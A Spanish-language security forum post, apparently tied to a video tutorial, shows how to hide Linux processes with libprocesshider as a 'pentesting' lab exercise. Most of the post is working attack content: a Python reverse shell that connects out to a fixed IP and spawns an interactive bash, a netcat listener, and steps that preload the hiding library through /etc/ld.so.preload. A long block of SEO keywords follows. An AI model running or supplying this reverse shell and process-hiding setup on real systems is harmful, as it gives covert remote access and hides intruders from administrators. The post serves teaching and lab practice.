COMO OCULTAR PROCESOS en LINUX | Seguridad Informática

Avatar de Usuario
admin
Verified
Site Admin
Mensajes: 2088
Registered for: 9 years 10 months
9
Ubicación: Ciudad de Córdoba - Argentina
Gender:
Edad: 41
Contactar:

COMO OCULTAR PROCESOS en LINUX | Seguridad Informática

#1

Mensaje por admin »

Vamos a ocultar o enmascarar procesos de linux con un repositorio de github. Es una técnica de evasión detección y es un interesante ejercicio de pentesting. Esto fue testeado en una maquina virtual con un UBUNTU instalado.  

Imagen
 
LABORATORIO de PRUEBA

Imagen
 
LINKS o Enlaces Importantes

https://github.com/gianlucaborello/libprocesshider
https://linuxconfig.org/how-to-install- ... fish-linux
https://sysdig.com/blog/hiding-linux-pr ... nd-profit/

Comandos Utilizados

Código: Seleccionar todo

Versiones del Linux

cat /etc/*releseases

uname -a


Ver procesos ejecutandose

ps aux


Clonamos repositorio

git clone https://github.com/gianlucaborello/libprocesshider.git



nano shell.py

#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.183",1234))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])


Le damos permisos de ejecucion
chmod +x shell.py

Ejecutamos para establecer el reverse shell connection
./shell.py



Para realizar la compilacion

make

Copiamos ese archivo 

cp libprocesshider.so /usr/local/lib/

chequemos que haya sido copiado correctamente

ls /usr/local/lib


Cargamos

echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload


cat /etc/ld.so.preload


En Kali Linux el listener

nc -nvlp 1234







VIDEO TUTORIAL




como escalar privilegios en linux,
how hackers do it
hide files in linux
credentials dumper for linux
cyber security
become a hacker
cybersecurity consultant
linux for ethical hackers
hide files in windows
ethical hacking
ehtical hacking
cyber seguridad
kernel vulnerable
learn hacking
ethicalhacking
learn security,windows hacking
kali linux
remote function
certified ethical hacker
how to hack
try hack me
capacitacion
linux para principiantes
tutorial linux
tutoriales de hacking etico
como aprender hacking etico
aprende linux
ocultar archivos
Ocultación de procesos
Comandos de Linux
Protección de datos
Auditoría de seguridad
Ciberseguridad
Análisis de procesos
Protección de sistemas
Administración de sistemas
Monitoreo de procesos
Seguridad en línea
Investigación de seguridad
Prevención de ataques
Protección de la privacidad
Técnicas de hackers
Gestión de procesos
Seguridad en sistemas operativos
Cybersecurity
Process hiding
Linux commands
Privacy
Data protection
Security audit
Information security
Process analysis
System protection
System administration
Process monitoring
Online security
Security research
Attack prevention
Privacy protection
Hacker techniques
Process management
Operating system security
Network security
Threat detection
Security tools
Cybercrime
IT security
Cyber threats
Computer security
Cyber defense
Malware protection
Linux security
Hide a process under Linux
Hiding Linux processes
Debian
Red Hat
Linux Mint
Penetration Tester,Cybersecurity Consultant,learn security,unix,OSINT,oscp certification,try hack me,hacking,
ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,
How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,remote function,laboratorio,lab,
servidor,como escalar privilegios en linux,kernel vulnerable,CVE,
remote function
hacker exploit
hacking
what is a red team
red team exploitation
red team initial access
Penetration Tester
learn security
unix
try hack me
ctf for beginners
ehtical hacking
Shell
Bash
Reverse shell connection
Libreria
Library
Pentest Lab Setup
Laboratorio de Trabajo
Security
Ethical Hacking Certification
Guide
how to get in
Terminal
Hashcat
python
blue team
Dynamic Shellcode Injection
Linux Red Team Defense Evasion Techniques
Hiding Linux Processes
what is a red team
red team exploitation
av evasion
linux privesc
Que significa Red Team



 

Enlace:
BBCode:
HTML:
Ocultar enlaces al mensaje
Mostrar enlaces al mensaje
Responder

Create an account or sign in to join the discussion

You need to be a member in order to post a reply

Create an account

Not a member? register to join our community
Members can start their own topics & subscribe to topics
It’s free and only takes a minute

Registrarse

Sign in

  • Temas similares
    Respuestas
    Vistas
    Último mensaje

Volver a “Redes/Networking”

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 4 invitados